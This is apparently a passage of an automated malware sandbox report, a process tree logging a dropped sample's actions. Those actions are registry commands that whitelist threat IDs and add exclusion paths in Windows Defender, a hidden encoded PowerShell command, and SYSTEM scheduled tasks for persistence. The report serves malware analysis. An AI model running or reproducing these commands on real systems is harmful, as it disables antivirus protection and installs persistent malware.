\"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
                                                      2⤵
                                                      • Drops file in System32 directory
                                                      • Modifies data under HKEY_USERS
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:4596
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                        3⤵
                                                          PID:5576
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                            4⤵
                                                              PID:5592
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                                                            3⤵
                                                              PID:5608
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                                              3⤵
                                                                PID:5636
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                                                3⤵
                                                                  PID:684
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                                                  3⤵
                                                                    PID:5668
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                                                    3⤵
                                                                      PID:2736
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                                                      3⤵
                                                                        PID:3708
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                                                        3⤵
                                                                          PID:4912
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                                                          3⤵
                                                                            PID:3540
                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                                                            3⤵
                                                                              PID:5680
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                                              3⤵
                                                                                PID:5696
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                                                3⤵
                                                                                  PID:4780
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                                                  3⤵
                                                                                    PID:5720
                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                                                    3⤵
                                                                                      PID:5732
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                                                      3⤵
                                                                                        PID:5756
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                                                        3⤵
                                                                                          PID:4368
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                                                          3⤵
                                                                                            PID:4064
                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                                                            3⤵
                                                                                              PID:5832
                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                                                              3⤵
                                                                                                PID:5856
                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                                                                3⤵
                                                                                                  PID:5864
                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                                                                  3⤵
                                                                                                    PID:5792
                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                                                                    3⤵
                                                                                                      PID:5752
                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                                                                      3⤵
                                                                                                        PID:5784
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                                                                        3⤵
                                                                                                          PID:5976
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
                                                                                                          3⤵
                                                                                                            PID:5900
                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
                                                                                                            3⤵
                                                                                                              PID:5896
                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
                                                                                                              3⤵
                                                                                                                PID:5904
                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
                                                                                                                3⤵
                                                                                                                  PID:3900
                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\BJoIZxhjKBkdHsthviR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\BJoIZxhjKBkdHsthviR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LHSdqcBuKngoC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LHSdqcBuKngoC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\UxlHwoNwU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\UxlHwoNwU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\sjazJYTbpqVU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\sjazJYTbpqVU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wuFoGWqRRrUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wuFoGWqRRrUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\JuaokLqPZqziZjVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\JuaokLqPZqziZjVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ZhTQaFaBDmtyfHbtF\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ZhTQaFaBDmtyfHbtF\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\gCqgzsIdJleQZgeU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\gCqgzsIdJleQZgeU\" /t REG_DWORD /d 0 /reg:64;"
                                                                                                                2⤵
                                                                                                                • Drops file in System32 directory
                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                PID:6040
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BJoIZxhjKBkdHsthviR" /t REG_DWORD /d 0 /reg:32
                                                                                                                  3⤵
                                                                                                                    PID:5356
                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BJoIZxhjKBkdHsthviR" /t REG_DWORD /d 0 /reg:32
                                                                                                                      4⤵
                                                                                                                        PID:2052
                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BJoIZxhjKBkdHsthviR" /t REG_DWORD /d 0 /reg:64
                                                                                                                      3⤵
                                                                                                                        PID:5252
                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UxlHwoNwU" /t REG_DWORD /d 0 /reg:32
                                                                                                                        3⤵
                                                                                                                          PID:4092
                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LHSdqcBuKngoC" /t REG_DWORD /d 0 /reg:64
                                                                                                                          3⤵
                                                                                                                            PID:5372
                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LHSdqcBuKngoC" /t REG_DWORD /d 0 /reg:32
                                                                                                                            3⤵
                                                                                                                              PID:3544
                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sjazJYTbpqVU2" /t REG_DWORD /d 0 /reg:32
                                                                                                                              3⤵
                                                                                                                                PID:4392
                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UxlHwoNwU" /t REG_DWORD /d 0 /reg:64
                                                                                                                                3⤵
                                                                                                                                  PID:3608
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sjazJYTbpqVU2" /t REG_DWORD /d 0 /reg:64
                                                                                                                                  3⤵
                                                                                                                                    PID:5260
                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wuFoGWqRRrUn" /t REG_DWORD /d 0 /reg:64
                                                                                                                                    3⤵
                                                                                                                                      PID:4508
                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wuFoGWqRRrUn" /t REG_DWORD /d 0 /reg:32
                                                                                                                                      3⤵
                                                                                                                                        PID:2344
                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\JuaokLqPZqziZjVB /t REG_DWORD /d 0 /reg:64
                                                                                                                                        3⤵
                                                                                                                                          PID:748
                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\JuaokLqPZqziZjVB /t REG_DWORD /d 0 /reg:32
                                                                                                                                          3⤵
                                                                                                                                            PID:5408
                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                            3⤵
                                                                                                                                              PID:5132
                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\ZhTQaFaBDmtyfHbtF /t REG_DWORD /d 0 /reg:32
                                                                                                                                              3⤵
                                                                                                                                                PID:4496
                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                3⤵
                                                                                                                                                  PID:5448
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                  3⤵
                                                                                                                                                    PID:5068
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                    3⤵
                                                                                                                                                      PID:2928
                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\gCqgzsIdJleQZgeU /t REG_DWORD /d 0 /reg:64
                                                                                                                                                      3⤵
                                                                                                                                                        PID:3048
                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\gCqgzsIdJleQZgeU /t REG_DWORD /d 0 /reg:32
                                                                                                                                                        3⤵
                                                                                                                                                          PID:5396
                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\ZhTQaFaBDmtyfHbtF /t REG_DWORD /d 0 /reg:64
                                                                                                                                                          3⤵
                                                                                                                                                            PID:344
                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                          schtasks /CREATE /TN "gDjbebkHa" /SC once /ST 00:33:18 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                                          2⤵
                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                          PID:5312
                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                          schtasks /run /I /tn "gDjbebkHa"
                                                                                                                                                          2⤵
                                                                                                                                                            PID:2784
                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                            schtasks /DELETE /F /TN "gDjbebkHa"
                                                                                                                                                            2⤵
                                                                                                                                                              PID:4800
                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                              schtasks /CREATE /TN "OyNPSoRSgtYwHEpij" /SC once /ST 00:16:55 /RU "SYSTEM" /TR "\"C:\Windows\Temp\gCqgzsIdJleQZgeU\qlRBUuRhyIJZIwv\GGlCJvc.exe\" gi /PPsite_idxMF 385118 /S" /V1 /F
                                                                                                                                                              2⤵
                                                                                                                                                              • Drops file in Windows directory
                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                              PID:5808
                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                              schtasks /run /I /tn "OyNPSoRSgtYwHEpij"
                                                                                                                                                              2⤵
                                                                                                                                                                PID:5752
                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                              1⤵
                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                              PID:2996
                                                                                                                                                              • C:\Windows\system32\gpupdate.exe
                                                                                                                                                                "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:5580
                                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                                C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                                                                                1⤵
                                                                                                                                                                  PID:3560
                                                                                                                                                                • C:\Windows\system32\gpscript.exe
                                                                                                                                                                  gpscript.exe /RefreshSystemParam
                                                                                                                                                                  1⤵
                                                                                                                                                                    PID:4576
                                                                                                                                                                  • C:\Windows\Temp\gCqgzsIdJleQZgeU\qlRBUuRhyIJZIwv\GGlCJvc.exe
                                                                                                                                                                    C:\Windows\Temp\gCqgzsIdJleQZgeU\qlRBUuRhyIJZIwv\GGlCJvc.exe gi /PPsite_idxMF 385118 /S
                                                                                                                                                                    1⤵
                                                                                                                                                                    • Checks computer location settings
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    • Drops Chrome extension
                                                                                                                                                                    • Drops desktop.ini file(s)
                                                                                                                                                                    • Drops file in System32 directory
                                                                                                                                                                    • Drops file in Program Files directory
                                                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                                                    PID:5900
                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                      schtasks /DELETE /F /TN "bEyYKbsuUozdEyKwWq"
                                                                                                                                                                      2⤵
                                                                                                                                                                        PID:6012
                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
                                                                                                                                                                        2⤵
                                                                                                                                                                          PID:4740
                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                            REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
                                                                                                                                                                            3⤵
                                                                                                                                                                              PID:3564
                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                            cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
                                                                                                                                                                            2⤵
                                                                                                                                                                              PID:4348
                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
                                                                                                                                                                                3⤵
                                                                                                                                                                                  PID:5128
                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\UxlHwoNwU\GHvfrs.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "qZVMaGbFbIrmves" /V1 /F
                                                                                                                                                                                2⤵
                                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                                PID:5216
                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                schtasks /CREATE /TN "qZVMaGbFbIrmves2" /F /xml "C:\Program Files (x86)\UxlHwoNwU\AzTghWX.xml" /RU "SYSTEM"
                                                                                                                                                                                2⤵
                                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                                PID:5252
                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                schtasks /END /TN "qZVMaGbFbIrmves"
                                                                                                                                                                                2⤵
                                                                                                                                                                                  PID:1292
                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                  schtasks /DELETE /F /TN "qZVMaGbFbIrmves"
                                                                                                                                                                                  2⤵
                                                                                                                                                                                    PID:4508
                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                    schtasks /CREATE /TN "bWEwnmVnhqclkO" /F /xml "C:\Program Files (x86)\sjazJYTbpqVU2\tQxEMZk.xml" /RU "SYSTEM"
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                    PID:3676
                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                    schtasks /CREATE /TN "gpxcSLvQxBBnt2" /F /xml "C:\ProgramData\JuaokLqPZqziZjVB\VYfIbbF.xml" /RU "SYSTEM"
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                    PID:5396
                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                    schtasks /CREATE /TN "ANJbqLXwqnrLUPLSN2" /F /xml "C:\Program Files (x86)\BJoIZxhjKBkdHsthviR\QaPbRtc.xml" /RU "SYSTEM"
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                    PID:6120
